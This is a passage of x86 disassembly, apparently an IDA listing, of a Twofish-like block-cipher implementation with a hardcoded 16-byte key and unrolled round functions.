mov edx, [ebp+var_4]
mov eax, [edx+1Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+1Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+20h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+20h], eax
mov edx, [ebp+var_4]
mov eax, [edx+24h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+24h], eax
mov edx, [ebp+var_4]
mov eax, [edx+28h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+28h], eax
mov edx, [ebp+var_4]
mov eax, [edx+2Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+2Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+30h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+30h], eax
mov edx, [ebp+var_4]
mov eax, [edx+34h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+34h], eax
mov edx, [ebp+var_4]
mov eax, [edx+38h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+38h], eax
mov edx, [ebp+var_4]
mov eax, [edx+3Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+3Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+40h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+40h], eax
mov edx, [ebp+var_4]
mov eax, [edx+44h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+44h], eax
mov edx, [ebp+var_4]
mov eax, [edx+48h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+48h], eax
mov edx, [ebp+var_4]
mov eax, [edx+4Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+4Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+50h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+50h], eax
mov edx, [ebp+var_4]
mov eax, [edx+54h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+54h], eax
mov edx, [ebp+var_4]
mov eax, [edx+58h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+58h], eax
mov edx, [ebp+var_4]
mov eax, [edx+5Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+5Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+60h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+60h], eax
mov edx, [ebp+var_4]
mov eax, [edx+64h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+64h], eax
mov edx, [ebp+var_4]
mov eax, [edx+68h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+68h], eax
mov edx, [ebp+var_4]
mov eax, [edx+6Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+6Ch], eax
mov edx, [ebp+var_4]
mov eax, [edx+70h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+70h], eax
mov edx, [ebp+var_4]
mov eax, [edx+74h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+74h], eax
mov edx, [ebp+var_4]
mov eax, [edx+78h]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+78h], eax
mov edx, [ebp+var_4]
mov eax, [edx+7Ch]
xor eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [ecx+7Ch], eax
mov esp, ebp
pop ebp
retn 4
sub_40D88C endp
; ---------------------------------------------------------------------------
dw 0CCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC90 proc near ; CODE XREF: rdata:0040A5E2�p
; sub_40AD10+127�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push ebx
push [ebp+arg_0]
mov edx, [ebp+arg_4]
push edx
mov ecx, [ebp+arg_8]
call sub_40DCAC
pop ebx
pop edi
pop esi
leave
retn 0Ch
sub_40DC90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCAC proc near ; CODE XREF: sub_40DC90+10�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_33 = dword ptr -33h
var_2F = dword ptr -2Fh
var_2B = dword ptr -2Bh
var_27 = dword ptr -27h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
mov [ebp+var_50], edx
mov [ebp+var_4C], ecx
mov byte ptr [ebp+var_20], 0FEh
mov byte ptr [ebp+var_20+1], 0DCh
mov byte ptr [ebp+var_20+2], 0BAh
mov byte ptr [ebp+var_20+3], 98h
mov byte ptr [ebp+var_1C], 76h
mov byte ptr [ebp+var_1C+1], 54h
mov byte ptr [ebp+var_1C+2], 32h
mov byte ptr [ebp+var_1C+3], 10h
mov byte ptr [ebp+var_18], 0A3h
mov byte ptr [ebp+var_18+1], 9Dh
mov byte ptr [ebp+var_18+2], 4Ah
mov byte ptr [ebp+var_18+3], 18h
mov byte ptr [ebp+var_14], 0F8h
mov byte ptr [ebp+var_14+1], 5Bh
mov byte ptr [ebp+var_14+2], 4Ah
mov byte ptr [ebp+var_14+3], 52h
mov [ebp+var_10], 0FEh
mov [ebp+var_F], 0DCh
mov [ebp+var_E], 0BAh
mov [ebp+var_D], 98h
mov [ebp+var_C], 76h
mov [ebp+var_B], 54h
mov [ebp+var_A], 32h
mov [ebp+var_9], 10h
mov [ebp+var_8], 0A3h
mov [ebp+var_7], 3Dh
mov [ebp+var_6], 4Ah
mov [ebp+var_5], 18h
mov [ebp+var_4], 0F8h
mov [ebp+var_3], 5Bh
mov [ebp+var_2], 4Ah
mov [ebp+var_1], 52h
push 0
mov dl, 2
lea ecx, [ebp+var_48]
call sub_40DD7C
mov eax, [ebp+var_20]
mov [ebp+var_33], eax
mov ecx, [ebp+var_1C]
mov [ebp+var_2F], ecx
mov edx, [ebp+var_18]
mov [ebp+var_2B], edx
mov eax, [ebp+var_14]
mov [ebp+var_27], eax
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_4]
shl edx, 3
push edx
mov eax, [ebp+arg_0]
push eax
mov edx, [ebp+var_4C]
lea ecx, [ebp+var_48]
call sub_40DDFF
mov esp, ebp
loc_40DD78: ; DATA XREF: .text:00401CD2�o
; .text:00401CE0�o
pop ebp
locret_40DD79: ; DATA XREF: .text:0040160D�o
; .text:0040161A�o ...
retn 8
sub_40DCAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD7C proc near ; CODE XREF: sub_40DCAC+93�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov [ebp+var_C], edx
mov [ebp+var_8], ecx
mov eax, [ebp+var_C]
and eax, 0FFh
cmp eax, 1
jz short loc_40DDEB
cmp [ebp+arg_0], 0
jz short loc_40DDEB
push 0
mov ecx, [ebp+var_8]
add ecx, 15h
push ecx
mov edx, [ebp+arg_0]
mov ecx, 80h
call sub_40F1D0
test eax, eax
jz short loc_40DDBD
mov eax, 0FFFFFFF8h
jmp short loc_40DDF8
; ---------------------------------------------------------------------------
loc_40DDBD: ; CODE XREF: sub_40DD7C+38�j
mov [ebp+var_4], 0
jmp short loc_40DDCF
; ---------------------------------------------------------------------------
loc_40DDC6: ; CODE XREF: sub_40DD7C+6D�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_40DDCF: ; CODE XREF: sub_40DD7C+48�j
cmp [ebp+var_4], 4
jge short loc_40DDEB
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edx, [esi+edx*4+15h]
mov [ecx+eax*4+1], edx
jmp short loc_40DDC6
; ---------------------------------------------------------------------------
loc_40DDEB: ; CODE XREF: sub_40DD7C+18�j
; sub_40DD7C+1E�j ...
mov eax, [ebp+var_8]
mov cl, byte ptr [ebp+var_C]
mov [eax], cl
mov eax, 1
loc_40DDF8: ; CODE XREF: sub_40DD7C+3F�j
pop esi
mov esp, ebp
pop ebp
retn 4
sub_40DD7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDFF proc near ; CODE XREF: sub_40DCAC+C5�p
; sub_40DDFF+92�p
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = byte ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0F0h
push esi
push edi
mov [ebp+var_F0], edx
mov [ebp+var_EC], ecx
mov eax, [ebp+var_F0]
mov ecx, [eax+4Dh]
mov [ebp+var_4], ecx
mov edx, [ebp+var_EC]
xor eax, eax
mov al, [edx]
mov [ebp+var_E4], eax
cmp [ebp+var_E4], 3
jnz loc_40DFC2
mov ecx, [ebp+var_EC]
mov byte ptr [ecx], 1
mov [ebp+var_E0], 0
jmp short loc_40DE63
; ---------------------------------------------------------------------------
loc_40DE54: ; CODE XREF: sub_40DDFF:loc_40DFAC�j
mov edx, [ebp+var_E0]
add edx, 1
mov [ebp+var_E0], edx
loc_40DE63: ; CODE XREF: sub_40DDFF+53�j
mov eax, [ebp+var_E0]
cmp eax, [ebp+arg_4]
jge loc_40DFB1
lea ecx, [ebp+var_24]
push ecx
push 80h
mov edx, [ebp+var_EC]
add edx, 1
push edx
mov edx, [ebp+var_F0]
mov ecx, [ebp+var_EC]
call sub_40DDFF
mov ecx, [ebp+var_E0]
and ecx, 7
mov eax, 80h
sar eax, cl
mov byte ptr [ebp+var_C], al
mov eax, [ebp+var_E0]
cdq
and edx, 7
add eax, edx
sar eax, 3
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, [ecx+eax]
mov eax, [ebp+var_C]
and eax, 0FFh
and edx, eax
mov eax, [ebp+var_24]
and eax, 0FFh
and eax, 80h
mov ecx, [ebp+var_E0]
and ecx, 7
sar eax, cl
xor edx, eax
mov byte ptr [ebp+var_8], dl
mov eax, [ebp+var_E0]
cdq
and edx, 7
add eax, edx
sar eax, 3
mov ecx, [ebp+arg_8]
xor edx, edx
mov dl, [ecx+eax]
mov ecx, edx
mov edx, [ebp+var_C]
and edx, 0FFh
not edx
and ecx, edx
mov eax, [ebp+var_8]
and eax, 0FFh
or ecx, eax
mov eax, [ebp+var_E0]
cdq
and edx, 7
add eax, edx
sar eax, 3
mov edx, [ebp+arg_8]
mov [edx+eax], cl
mov eax, [ebp+var_8]
and eax, 0FFh
mov ecx, [ebp+var_E0]
and ecx, 7
mov edx, 7
sub edx, ecx
mov ecx, edx
sar eax, cl
mov byte ptr [ebp+var_2C], al
mov [ebp+var_28], 0Fh
jmp short loc_40DF5D
; ---------------------------------------------------------------------------
loc_40DF54: ; CODE XREF: sub_40DDFF+1AB�j
mov eax, [ebp+var_28]
sub eax, 1
mov [ebp+var_28], eax
loc_40DF5D: ; CODE XREF: sub_40DDFF+153�j
cmp [ebp+var_28], 0
jl short loc_40DFAC
mov ecx, [ebp+var_EC]
add ecx, [ebp+var_28]
xor edx, edx
mov dl, [ecx+1]
sar edx, 7
mov [ebp+var_E8], dl
mov eax, [ebp+var_EC]
add eax, [ebp+var_28]
xor ecx, ecx
mov cl, [eax+1]
shl ecx, 1
mov edx, [ebp+var_2C]
and edx, 0FFh
xor ecx, edx
mov eax, [ebp+var_EC]
add eax, [ebp+var_28]
mov [eax+1], cl
mov cl, [ebp+var_E8]
mov byte ptr [ebp+var_2C], cl
jmp short loc_40DF54
; ---------------------------------------------------------------------------
loc_40DFAC: ; CODE XREF: sub_40DDFF+162�j
jmp loc_40DE54
; ---------------------------------------------------------------------------
loc_40DFB1: ; CODE XREF: sub_40DDFF+6D�j
mov edx, [ebp+var_EC]
mov byte ptr [edx], 3
mov eax, [ebp+arg_4]
jmp loc_40F13D
; ---------------------------------------------------------------------------
loc_40DFC2: ; CODE XREF: sub_40DDFF+3A�j
mov eax, [ebp+var_F0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_40DFDD
xor dl, dl
mov ecx, [ebp+var_F0]
call sub_40F145
loc_40DFDD: ; CODE XREF: sub_40DDFF+1CF�j
mov edx, [ebp+var_4]
shl edx, 1
lea ecx, ds:20h[edx*4]
mov esi, [ebp+var_F0]
add esi, 81h
lea edi, [ebp+var_DC]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
cmp [ebp+var_E4], 2
jnz short loc_40E044
mov ecx, [ebp+var_EC]
mov edx, [ecx+15h]
mov [ebp+var_3C], edx
mov eax, [ebp+var_EC]
mov ecx, [eax+19h]
mov [ebp+var_38], ecx
mov edx, [ebp+var_EC]
mov eax, [edx+1Dh]
mov [ebp+var_34], eax
mov ecx, [ebp+var_EC]
mov edx, [ecx+21h]
mov [ebp+var_30], edx
jmp short loc_40E05D
; ---------------------------------------------------------------------------
loc_40E044: ; CODE XREF: sub_40DDFF+211�j
mov [ebp+var_30], 0
mov eax, [ebp+var_30]
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
mov [ebp+var_38], ecx
mov edx, [ebp+var_38]
mov [ebp+var_3C], edx
loc_40E05D: ; CODE XREF: sub_40DDFF+243�j
mov [ebp+var_E0], 0
jmp short loc_40E08C
; ---------------------------------------------------------------------------
loc_40E069: ; CODE XREF: sub_40DDFF:loc_40F0FC�j
mov eax, [ebp+var_E0]
add eax, 80h
mov [ebp+var_E0], eax
mov ecx, [ebp+arg_0]
add ecx, 10h
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_8]
add edx, 10h
mov [ebp+arg_8], edx
loc_40E08C: ; CODE XREF: sub_40DDFF+268�j
mov eax, [ebp+var_E0]
cmp eax, [ebp+arg_4]
jge loc_40F101
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor edx, [ebp+var_DC]
xor edx, [ebp+var_3C]
mov [ebp+var_24], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
xor ecx, [ebp+var_D8]
xor ecx, [ebp+var_38]
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
xor eax, [ebp+var_D4]
xor eax, [ebp+var_34]
mov [ebp+var_1C], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
xor edx, [ebp+var_D0]
xor edx, [ebp+var_30]
mov [ebp+var_18], edx
mov eax, [ebp+var_24]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_24+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_24+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_24+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_20+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_20]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_20+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_20+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
rol eax, 1
mov [ebp+var_18], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_44]
mov edx, [ebp+var_1C]
xor edx, ecx
mov [ebp+var_1C], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_40]
mov eax, [ebp+var_18]
xor eax, edx
mov [ebp+var_18], eax
mov ecx, [ebp+var_1C]
ror ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_1C]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_1C+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_1C+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_1C+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_10], edx
mov edx, [ebp+var_18+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_18]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_18+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_18+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_14], edx
mov edx, [ebp+var_20]
rol edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_24]
xor ecx, eax
mov [ebp+var_24], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx*2]
add ecx, [ebp+var_48]
mov edx, [ebp+var_20]
xor edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
ror eax, 1
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_24+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_24+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_24+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_10], ecx
mov ecx, [ebp+var_20+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_20]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_20+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_20+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_18]
rol ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
add edx, [ebp+var_54]
mov eax, [ebp+var_1C]
xor eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx*2]
add eax, [ebp+var_50]
mov ecx, [ebp+var_18]
xor ecx, eax
mov [ebp+var_18], ecx
mov edx, [ebp+var_1C]
ror edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_1C+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_1C+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_1C+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_18+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_18]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_18+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_18+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_20]
rol eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_5C]
mov edx, [ebp+var_24]
xor edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_58]
mov eax, [ebp+var_20]
xor eax, edx
mov [ebp+var_20], eax
mov ecx, [ebp+var_24]
ror ecx, 1
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_24+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_24+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_24+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_10], edx
mov edx, [ebp+var_20+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_20]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_20+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_20+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_14], edx
mov edx, [ebp+var_18]
rol edx, 1
mov [ebp+var_18], edx
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_64]
mov ecx, [ebp+var_1C]
xor ecx, eax
mov [ebp+var_1C], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx*2]
add ecx, [ebp+var_60]
mov edx, [ebp+var_18]
xor edx, ecx
mov [ebp+var_18], edx
mov eax, [ebp+var_1C]
ror eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_1C+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_1C+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_1C+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_10], ecx
mov ecx, [ebp+var_18+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_18]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_18+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_18+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_20]
rol ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
add edx, [ebp+var_6C]
mov eax, [ebp+var_24]
xor eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx*2]
add eax, [ebp+var_68]
mov ecx, [ebp+var_20]
xor ecx, eax
mov [ebp+var_20], ecx
mov edx, [ebp+var_24]
ror edx, 1
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_24+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_24+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_24+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_20+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_20]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_20+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_20+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
rol eax, 1
mov [ebp+var_18], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_74]
mov edx, [ebp+var_1C]
xor edx, ecx
mov [ebp+var_1C], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_70]
mov eax, [ebp+var_18]
xor eax, edx
mov [ebp+var_18], eax
mov ecx, [ebp+var_1C]
ror ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_1C]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_1C+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_1C+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_1C+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_10], edx
mov edx, [ebp+var_18+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_18]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
